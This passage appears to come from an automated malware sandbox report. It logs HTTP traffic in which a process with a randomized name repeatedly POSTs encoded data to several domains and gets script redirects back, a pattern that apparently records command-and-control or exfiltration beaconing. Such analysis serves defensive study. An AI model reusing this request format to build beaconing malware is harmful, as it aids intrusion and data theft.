                                              Jul 21, 2024 13:34:37.232394934 CEST1.1.1.1192.168.2.70xcf97No error (0)gtprivatewealth.com15.197.148.33A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • www.italyuntold.com
                                              • www.funnelkakes.com
                                              • www.shiybalinks.com
                                              • www.olhadeputat.com
                                              • www.jleabres.com
                                              • www.evoolihubs.shop
                                              • www.fardehb.top
                                              • www.sehraji.com
                                              • www.ecoaxion.com
                                              • www.809934.com
                                              • www.betano627.com
                                              • www.nationsincbook.com
                                              • www.karak-networks.online
                                              • www.gtprivatewealth.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.7497043.33.130.190806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:31:10.021895885 CEST449OUTGET /5yb0/?5HE=6Dg8z4KG4YPExlQ9XMiCDUjuBaAtCe8c6s2BJ4Cptukw6Fp783jCo9a8aBIuYHvq1uoCHxO9BKTCqzYY5Vc8A4FzhFFqSFNP5lWxTqvoYXkdyieyJBVlwNBJ3PLm6lrF0y9xthhOWCBy&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.italyuntold.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 21, 2024 13:31:10.500219107 CEST412INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Sun, 21 Jul 2024 11:31:10 GMT
                                              Content-Type: text/html
                                              Content-Length: 272
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 35 48 45 3d 36 44 67 38 7a 34 4b 47 34 59 50 45 78 6c 51 39 58 4d 69 43 44 55 6a 75 42 61 41 74 43 65 38 63 36 73 32 42 4a 34 43 70 74 75 6b 77 36 46 70 37 38 33 6a 43 6f 39 61 38 61 42 49 75 59 48 76 71 31 75 6f 43 48 78 4f 39 42 4b 54 43 71 7a 59 59 35 56 63 38 41 34 46 7a 68 46 46 71 53 46 4e 50 35 6c 57 78 54 71 76 6f 59 58 6b 64 79 69 65 79 4a 42 56 6c 77 4e 42 4a 33 50 4c 6d 36 6c 72 46 30 79 39 78 74 68 68 4f 57 43 42 79 26 55 58 52 3d 6b 54 50 38 58 66 49 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?5HE=6Dg8z4KG4YPExlQ9XMiCDUjuBaAtCe8c6s2BJ4Cptukw6Fp783jCo9a8aBIuYHvq1uoCHxO9BKTCqzYY5Vc8A4FzhFFqSFNP5lWxTqvoYXkdyieyJBVlwNBJ3PLm6lrF0y9xthhOWCBy&UXR=kTP8XfI8"}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.74970676.223.67.189806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:31:30.617557049 CEST718OUTPOST /sgjw/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.funnelkakes.com
                                              Origin: http://www.funnelkakes.com
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.funnelkakes.com/sgjw/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 48 4b 4e 42 66 51 38 38 32 69 67 35 34 59 36 56 61 53 43 70 54 4c 53 6e 33 72 70 75 6a 34 75 31 48 53 42 59 52 74 59 75 45 78 37 70 59 35 4c 44 6b 41 70 54 7a 6a 49 45 35 50 34 5a 31 62 6a 6c 52 38 4e 6d 39 4f 70 61 48 6a 4b 73 4d 68 57 51 50 49 53 75 6c 67 35 78 6b 31 46 39 72 54 76 7a 50 7a 69 69 79 4f 71 66 50 48 34 46 65 68 78 6e 44 39 73 33 6c 64 49 71 35 33 6e 36 39 57 4e 79 67 73 53 36 41 43 30 34 72 33 61 58 55 6b 33 50 44 73 75 41 49 49 4e 69 62 4a 38 48 67 36 57 45 53 61 54 67 49 2b 4a 74 7a 52 6b 32 55 37 76 64 75 4e 46 78 6a 70 59 57 38 4d 66 68 47 6e 6f 34 69 67 30 70 4e 67 43 6a 47 73 66 4d 55 47 41 6a 63 67 3d 3d
                                              Data Ascii: 5HE=HKNBfQ882ig54Y6VaSCpTLSn3rpuj4u1HSBYRtYuEx7pY5LDkApTzjIE5P4Z1bjlR8Nm9OpaHjKsMhWQPISulg5xk1F9rTvzPziiyOqfPH4FehxnD9s3ldIq53n69WNygsS6AC04r3aXUk3PDsuAIINibJ8Hg6WESaTgI+JtzRk2U7vduNFxjpYW8MfhGno4ig0pNgCjGsfMUGAjcg==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.74970776.223.67.189806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:31:33.155786037 CEST738OUTPOST /sgjw/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.funnelkakes.com
                                              Origin: http://www.funnelkakes.com
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.funnelkakes.com/sgjw/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 48 4b 4e 42 66 51 38 38 32 69 67 35 35 35 4b 56 4a 31 75 70 62 4c 53 34 35 4c 70 75 70 59 75 78 48 53 4e 59 52 6f 34 41 45 43 66 70 59 62 6a 44 6c 42 70 54 77 6a 49 45 32 76 34 63 6f 4c 69 6e 52 39 78 55 39 4b 70 61 48 6a 4f 73 4d 68 47 51 50 35 53 74 71 51 35 76 74 56 46 37 76 54 76 7a 50 7a 69 69 79 4f 2f 34 50 48 77 46 65 53 35 6e 46 66 45 30 72 39 49 74 78 58 6e 36 35 57 4d 61 67 73 53 69 41 41 51 53 72 78 57 58 55 6b 48 50 44 39 75 48 47 49 4e 6f 57 70 39 76 68 70 71 4d 4b 59 58 34 42 74 39 54 35 68 6f 50 59 74 79 2f 30 76 4a 64 39 34 67 74 34 4f 37 58 52 42 31 4e 67 68 77 78 41 43 32 43 5a 62 36 6d 5a 55 68 6e 4b 55 48 69 73 51 7a 6a 54 50 67 53 39 76 68 79 33 65 4d 2f 46 4d 63 3d
                                              Data Ascii: 5HE=HKNBfQ882ig555KVJ1upbLS45LpupYuxHSNYRo4AECfpYbjDlBpTwjIE2v4coLinR9xU9KpaHjOsMhGQP5StqQ5vtVF7vTvzPziiyO/4PHwFeS5nFfE0r9ItxXn65WMagsSiAAQSrxWXUkHPD9uHGINoWp9vhpqMKYX4Bt9T5hoPYty/0vJd94gt4O7XRB1NghwxAC2CZb6mZUhnKUHisQzjTPgS9vhy3eM/FMc=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.74970876.223.67.189806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:31:36.025886059 CEST1751OUTPOST /sgjw/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.funnelkakes.com
                                              Origin: http://www.funnelkakes.com
                                              Connection: close
                                              Content-Length: 1248
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.funnelkakes.com/sgjw/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 48 4b 4e 42 66 51 38 38 32 69 67 35 35 35 4b 56 4a 31 75 70 62 4c 53 34 35 4c 70 75 70 59 75 78 48 53 4e 59 52 6f 34 41 45 43 58 70 59 49 62 44 6a 69 52 54 78 6a 49 45 37 50 34 64 6f 4c 69 6d 52 39 6f 66 39 4b 73 76 48 6d 53 73 65 53 65 51 4c 39 47 74 39 41 35 76 76 56 46 2b 72 54 76 63 50 79 53 6d 79 4f 76 34 50 48 77 46 65 56 4a 6e 43 4e 73 30 37 4e 49 71 35 33 6e 6d 39 57 4d 68 67 73 4b 79 41 41 45 6f 72 42 32 58 56 41 72 50 41 50 47 48 4f 49 4e 75 46 5a 39 33 68 70 6e 53 4b 59 4c 65 42 73 4a 35 35 6d 73 50 62 62 2f 58 6a 74 35 56 2b 49 77 74 36 4f 47 36 65 78 74 66 6e 52 73 53 65 67 57 31 64 36 36 4c 52 43 5a 76 44 42 65 43 32 32 2f 53 55 62 63 32 38 71 77 74 6d 4b 77 55 61 34 6e 6a 66 78 6a 65 35 53 6e 65 7a 68 75 38 6b 35 46 54 71 32 42 58 47 32 66 79 35 6f 76 39 6f 75 70 44 54 66 41 50 6e 61 32 71 2b 47 50 6d 65 5a 2b 46 53 58 4a 51 51 76 62 4d 44 4c 30 64 44 6b 47 38 73 49 30 79 69 4d 41 36 67 67 6b 54 36 55 4d 46 5a 44 64 49 58 65 6a 79 2f 58 4d 67 4b 48 43 46 4c 30 76 44 43 78 [TRUNCATED]
                                              Data Ascii: 5HE=HKNBfQ882ig555KVJ1upbLS45LpupYuxHSNYRo4AECXpYIbDjiRTxjIE7P4doLimR9of9KsvHmSseSeQL9Gt9A5vvVF+rTvcPySmyOv4PHwFeVJnCNs07NIq53nm9WMhgsKyAAEorB2XVArPAPGHOINuFZ93hpnSKYLeBsJ55msPbb/Xjt5V+Iwt6OG6extfnRsSegW1d66LRCZvDBeC22/SUbc28qwtmKwUa4njfxje5Snezhu8k5FTq2BXG2fy5ov9oupDTfAPna2q+GPmeZ+FSXJQQvbMDL0dDkG8sI0yiMA6ggkT6UMFZDdIXejy/XMgKHCFL0vDCx7rPw71xfdkQkXnjt2O5qwlQawOWkLMLm+Y9NzPA2f4SVNHgmLLS/uHmoZigRC4fyxXy9lLsaDnnezAtX7YgjFTO8kZmwaPeoz4GQj6fiH/8OnpbwGw/cKbjD6nI4zm379dKwh9mRJQMZ61XkH5KpaKnY2fYutl0WrGSOl78loY80BNPsK0ZAMS4Fn8ViMAFCdsJrvrM7ihujhTPMI4UioEEgpzVKkt4SA8Clo5glKUeZorfzong18jyoTwvwrKUE2y8p3ZCY4H6JX7HrTRkuxSXnPkOq1vvjlmw4H1vHGwVNvvrUDSIEUAY7rPlOvFO6pqz+2YTCbZS9pO5Rga+4SSRl/mADnTvBYcwEUmwvZnKDsuoQ0WlqN6brVjAtDKRy8p1G8HkRsnyx5M1cPRqQhXPAQieYIN4oZHjkKwQOrgOnueKaCXXBZEsUxlO0KCvxKXr1SQwhnv84cSXSZ/UuoBn2GMuV/fn8tFisGGi64irw7yWYkcHuUcyOv/HTr+z++eYVGhbFk9akiBt2g9epq6xdDl0Cz/9pO4S3boKX1Om8Dgj9wzy+c68UkIKr3vaoNIIbi9xiNMd88dhRmgiIJtxXOzzkW+kozeui5TdzEpGB4aSaE1drFjpoNIs89zV/h4oIM1bpCkI5Qq7wU7MmMaqEsmSLalZZ8m [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.74970976.223.67.189806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:31:39.326219082 CEST449OUTGET /sgjw/?5HE=KIlhclE33g4p4bCYeWfzGem6xaRipp25IwoHZsonIzqxF8P3vwkjyQxG0+k1uafiZ5V1+a0hVzemZgjWOIKcqi50j1ligTTnKiK+69bNO3Q0fQNjMb89nuUv03Pn1kYgjPKVAy4urBGQ&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.funnelkakes.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 21, 2024 13:31:39.801973104 CEST412INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Sun, 21 Jul 2024 11:31:39 GMT
                                              Content-Type: text/html
                                              Content-Length: 272
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 35 48 45 3d 4b 49 6c 68 63 6c 45 33 33 67 34 70 34 62 43 59 65 57 66 7a 47 65 6d 36 78 61 52 69 70 70 32 35 49 77 6f 48 5a 73 6f 6e 49 7a 71 78 46 38 50 33 76 77 6b 6a 79 51 78 47 30 2b 6b 31 75 61 66 69 5a 35 56 31 2b 61 30 68 56 7a 65 6d 5a 67 6a 57 4f 49 4b 63 71 69 35 30 6a 31 6c 69 67 54 54 6e 4b 69 4b 2b 36 39 62 4e 4f 33 51 30 66 51 4e 6a 4d 62 38 39 6e 75 55 76 30 33 50 6e 31 6b 59 67 6a 50 4b 56 41 79 34 75 72 42 47 51 26 55 58 52 3d 6b 54 50 38 58 66 49 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?5HE=KIlhclE33g4p4bCYeWfzGem6xaRipp25IwoHZsonIzqxF8P3vwkjyQxG0+k1uafiZ5V1+a0hVzemZgjWOIKcqi50j1ligTTnKiK+69bNO3Q0fQNjMb89nuUv03Pn1kYgjPKVAy4urBGQ&UXR=kTP8XfI8"}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.7497103.33.130.190806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:31:44.848642111 CEST718OUTPOST /knjl/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.shiybalinks.com
                                              Origin: http://www.shiybalinks.com
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.shiybalinks.com/knjl/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 4b 49 64 70 2f 4f 32 37 2b 69 67 6d 78 4d 6d 4b 50 32 6e 4e 44 2b 31 49 55 76 4f 69 47 76 6c 2b 6e 67 68 51 79 5a 6e 32 6f 62 6c 70 6b 69 47 35 37 48 4e 48 58 4d 68 34 64 48 32 47 2b 35 69 53 42 76 37 73 4c 39 61 59 55 61 31 73 35 6f 7a 5a 2f 66 4e 5a 6b 51 64 79 4b 73 45 67 47 54 74 76 4e 62 45 61 2f 57 38 43 34 6f 32 54 4c 6d 4d 54 73 4c 55 2b 2f 68 62 78 4d 48 74 52 75 31 44 67 36 33 4b 37 58 74 44 45 71 6b 55 49 34 49 67 37 35 61 79 4a 39 6b 71 38 59 35 72 44 30 45 6b 57 52 35 76 62 65 31 4d 67 4d 4a 4e 71 77 2f 65 51 2f 58 68 76 43 68 34 59 47 30 35 34 64 51 78 36 33 68 6d 6b 79 6c 49 41 6a 4a 52 6a 54 4e 64 53 4e 67 3d 3d
                                              Data Ascii: 5HE=KIdp/O27+igmxMmKP2nND+1IUvOiGvl+nghQyZn2oblpkiG57HNHXMh4dH2G+5iSBv7sL9aYUa1s5ozZ/fNZkQdyKsEgGTtvNbEa/W8C4o2TLmMTsLU+/hbxMHtRu1Dg63K7XtDEqkUI4Ig75ayJ9kq8Y5rD0EkWR5vbe1MgMJNqw/eQ/XhvCh4YG054dQx63hmkylIAjJRjTNdSNg==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.7497113.33.130.190806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:31:47.389334917 CEST738OUTPOST /knjl/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.shiybalinks.com
                                              Origin: http://www.shiybalinks.com
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.shiybalinks.com/knjl/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 4b 49 64 70 2f 4f 32 37 2b 69 67 6d 2b 4a 75 4b 63 68 4c 4e 55 4f 31 58 4e 66 4f 69 66 66 6c 36 6e 67 74 51 79 59 6a 6d 72 70 78 70 39 48 36 35 38 47 4e 48 62 73 68 34 57 6e 32 48 39 4a 69 56 42 76 33 6b 4c 38 4b 59 55 63 5a 73 35 70 44 5a 2b 73 6c 65 6c 41 64 30 57 73 45 75 5a 44 74 76 4e 62 45 61 2f 57 34 6b 34 6f 65 54 4b 57 38 54 2b 36 55 68 68 52 62 32 4c 48 74 52 2f 46 44 38 36 33 4b 4a 58 73 4f 66 71 69 59 49 34 4e 6b 37 35 6f 4c 66 6b 55 71 2b 53 5a 72 54 30 78 38 53 62 38 62 61 55 6d 59 4a 57 72 4a 53 78 4a 44 79 6c 31 74 44 63 77 41 6a 43 32 64 4f 4b 32 73 50 31 67 69 38 2f 48 38 68 38 2b 30 4a 65 66 38 57 62 53 35 32 4c 30 6b 6b 53 75 6d 4d 51 74 41 35 49 4f 30 32 47 6a 6f 3d
                                              Data Ascii: 5HE=KIdp/O27+igm+JuKchLNUO1XNfOiffl6ngtQyYjmrpxp9H658GNHbsh4Wn2H9JiVBv3kL8KYUcZs5pDZ+slelAd0WsEuZDtvNbEa/W4k4oeTKW8T+6UhhRb2LHtR/FD863KJXsOfqiYI4Nk75oLfkUq+SZrT0x8Sb8baUmYJWrJSxJDyl1tDcwAjC2dOK2sP1gi8/H8h8+0Jef8WbS52L0kkSumMQtA5IO02Gjo=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.7497123.33.130.190806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:31:50.187031031 CEST1751OUTPOST /knjl/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.shiybalinks.com
                                              Origin: http://www.shiybalinks.com
                                              Connection: close
                                              Content-Length: 1248
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.shiybalinks.com/knjl/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 4b 49 64 70 2f 4f 32 37 2b 69 67 6d 2b 4a 75 4b 63 68 4c 4e 55 4f 31 58 4e 66 4f 69 66 66 6c 36 6e 67 74 51 79 59 6a 6d 72 6f 4a 70 68 68 75 35 38 68 5a 48 56 4d 68 34 62 48 32 43 39 4a 69 49 42 72 54 67 4c 38 47 69 55 5a 46 73 34 50 2f 5a 35 64 6c 65 75 41 64 30 4f 73 45 76 47 54 73 31 4e 61 30 65 2f 56 51 6b 34 6f 65 54 4b 56 6b 54 39 72 55 68 6a 52 62 78 4d 48 74 64 75 31 44 59 36 33 53 6a 58 73 61 50 71 53 34 49 37 74 30 37 71 37 7a 66 73 55 71 34 56 5a 71 4d 30 78 35 4d 62 34 43 6a 55 6c 45 6e 57 72 78 53 78 76 4b 76 32 6b 64 39 41 78 30 45 42 51 38 71 42 51 41 66 38 52 65 7a 2f 41 51 36 7a 2f 34 39 62 66 30 35 53 33 38 48 65 32 4d 78 4b 4f 47 6c 5a 59 68 6a 54 62 34 67 61 6c 4d 45 67 75 37 47 71 31 41 31 34 54 34 52 37 59 46 42 59 52 4b 6f 50 4a 78 2b 50 6a 37 64 6d 50 64 51 70 73 49 54 48 30 37 6e 4a 4f 5a 62 43 47 65 52 5a 59 54 72 6c 76 30 6a 38 64 74 47 37 4f 6f 49 33 47 2f 67 4b 50 43 66 66 71 31 4f 6a 77 2f 34 76 6b 4f 78 4b 4d 54 51 6d 32 42 7a 57 48 75 5a 59 72 48 59 44 32 [TRUNCATED]
                                              Data Ascii: 5HE=KIdp/O27+igm+JuKchLNUO1XNfOiffl6ngtQyYjmroJphhu58hZHVMh4bH2C9JiIBrTgL8GiUZFs4P/Z5dleuAd0OsEvGTs1Na0e/VQk4oeTKVkT9rUhjRbxMHtdu1DY63SjXsaPqS4I7t07q7zfsUq4VZqM0x5Mb4CjUlEnWrxSxvKv2kd9Ax0EBQ8qBQAf8Rez/AQ6z/49bf05S38He2MxKOGlZYhjTb4galMEgu7Gq1A14T4R7YFBYRKoPJx+Pj7dmPdQpsITH07nJOZbCGeRZYTrlv0j8dtG7OoI3G/gKPCffq1Ojw/4vkOxKMTQm2BzWHuZYrHYD2wcql7CHEdhD1j9FU6Dpca9yCeO33T5amVxJGeP+ci7gMPaGnrFlZczrjp1VHKuVe7kasWZtiGmITsSdlZzMbgBHKAHndOR9l0lH4Rsatkwk9ljhQCtR1+RC5CwCmzjN5Dpty76hRF4PSlWsEiTZanSX3kGLh5VqkGzbyMhe7Ri0qJGI6hTE4+2aKxpmwEiSgMgSRIy7MDfGSo2t8z3k5Zan/C/NTUAhuyB7DJunBEOiwhAb6tePFIW15izjrmbFpaaYf3Cu1EaOZVNsUMNDRL4QtIBUvepnfJkNjxrARCAqs5NX7UbUvVCY17y8rvLqW4StPq3OUdQs72ajhoqigoPulupqeLFHIOvpKJf9TsWvlgk5KkuFmoxCbQdoLnNttdP9+ql7kP+ut5fLiWKoaC+EtcdSXIyvm00JubS6IgL98I+1k/1BBpRsVxBCtYBjOGer4PVd0L3hMxVmdwPHkk2SpE+LDux3N28WQaH2ig1CDUcS3hQ0ZL4WQPwhEPyAlAV5VfLR6p20ZQOE5/Q+lcCoyRe1UZYSX0havE9tLcNUkZvEBipfigljkhXuwWSG4vJEZxhyoHiCEBpEAq3bvp5sqV0zbWYx6N+N1+gyAnCqTwqABF8oV6D+O7Dm5O9N86w6YQg5fY9ZLalnbUGaLN8c4K0U9mvu2Ta [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.7497133.33.130.190806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:31:52.717626095 CEST449OUTGET /knjl/?5HE=HK1J84a27gkQ4beEKC61UbBVEOGAatJ0tiVbzvXViKVP6nm44mJHR8I5ZHuKj7DoAb3eP5+6cpVF46y42P5lmjxSIvkSYBgtFYg212IX7KyLN1Uz7dQ5iXPzMiB/yXbJ01avbd6tiSoS&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.shiybalinks.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 21, 2024 13:31:53.199148893 CEST412INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Sun, 21 Jul 2024 11:31:53 GMT
                                              Content-Type: text/html
                                              Content-Length: 272
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 35 48 45 3d 48 4b 31 4a 38 34 61 32 37 67 6b 51 34 62 65 45 4b 43 36 31 55 62 42 56 45 4f 47 41 61 74 4a 30 74 69 56 62 7a 76 58 56 69 4b 56 50 36 6e 6d 34 34 6d 4a 48 52 38 49 35 5a 48 75 4b 6a 37 44 6f 41 62 33 65 50 35 2b 36 63 70 56 46 34 36 79 34 32 50 35 6c 6d 6a 78 53 49 76 6b 53 59 42 67 74 46 59 67 32 31 32 49 58 37 4b 79 4c 4e 31 55 7a 37 64 51 35 69 58 50 7a 4d 69 42 2f 79 58 62 4a 30 31 61 76 62 64 36 74 69 53 6f 53 26 55 58 52 3d 6b 54 50 38 58 66 49 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?5HE=HK1J84a27gkQ4beEKC61UbBVEOGAatJ0tiVbzvXViKVP6nm44mJHR8I5ZHuKj7DoAb3eP5+6cpVF46y42P5lmjxSIvkSYBgtFYg212IX7KyLN1Uz7dQ5iXPzMiB/yXbJ01avbd6tiSoS&UXR=kTP8XfI8"}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.749714188.114.97.3806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:31:58.279372931 CEST718OUTPOST /xm40/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.olhadeputat.com
                                              Origin: http://www.olhadeputat.com
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.olhadeputat.com/xm40/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
